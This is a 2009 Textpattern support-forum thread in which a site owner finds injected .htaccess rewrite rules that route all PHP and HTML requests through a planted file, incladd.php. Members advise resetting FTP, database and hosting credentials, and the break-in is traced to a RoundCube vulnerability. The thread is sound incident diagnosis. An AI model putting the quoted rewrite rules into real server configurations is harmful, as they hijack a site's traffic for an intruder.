Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2009-03-28 02:54:53

schussat
Plugin Author
Registered: 2004-02-24
Posts: 101
Website

[resolved] Is this an attack?

I upgraded to 4.0.8 last weekend, and this evening was poking around and found the following at the top of my .htaccess:

RewriteCond /MY/ROOT/PATH/PUBLIC_HTML/archives/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !777b16.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /archives/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

And a file incladd.php in my archives directory.

Is this an attack? What’s going on?


-Alan

Offline

#2 2009-03-28 03:09:32

schussat
Plugin Author
Registered: 2004-02-24
Posts: 101
Website

Re: [resolved] Is this an attack?

yeah, incladd.php shows up on searches as an exploit. Fuck.


-Alan

Offline

#3 2009-03-28 08:07:29

the_ghost
Plugin Author
From: Minsk, The Republic of Belarus
Registered: 2007-07-26
Posts: 907
Website

Re: [resolved] Is this an attack?

IMHO justchange ftp passwords. It’simposible to chenage .htaccess content via php scripts


Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebok?

Offline

#4 2009-03-28 08:15:11

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,090
Website GitHub Mastodon Twitter

Re: [resolved] Is this an attack?

if they got in via ftp, it will also be advisable to change your db password too.


Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

Offline

#5 2009-03-28 08:35:49

jakob
Admin
From: Germany
Registered: 2005-01-20
Posts: 4,726
Website

Re: [resolved] Is this an attack?

Never seen this before but googled and saw that many complain about it being reinstated. One further recommendation mentioned was to check your hosting panel/account login, email and password, so that places from where the ftp account details are set are also no longer reachable with the old contact details.


TXP Builders – finely-crafted code, design and txp

Offline

#6 2009-03-28 13:59:09

schussat
Plugin Author
Registered: 2004-02-24
Posts: 101
Website

Re: [resolved] Is this an attack?

Thanks for feedback, all. I think the original source of the exploit was a vulnerability in roundcube, which I’ve now deleted, and I’ve changed all passwords.


-Alan

Offline

#7 2009-04-08 16:29:17

jdueck
Plugin Author
From: Minneapolis, MN
Registered: 2004-02-27
Posts: 147
Website

Re: [resolved] Is this an attack?

I just had this same problem on my personal site, looks like they got in on the 23rd. I knew I should have deleted roundcube long ago.

Offline

Board footer

Powered by FluxBB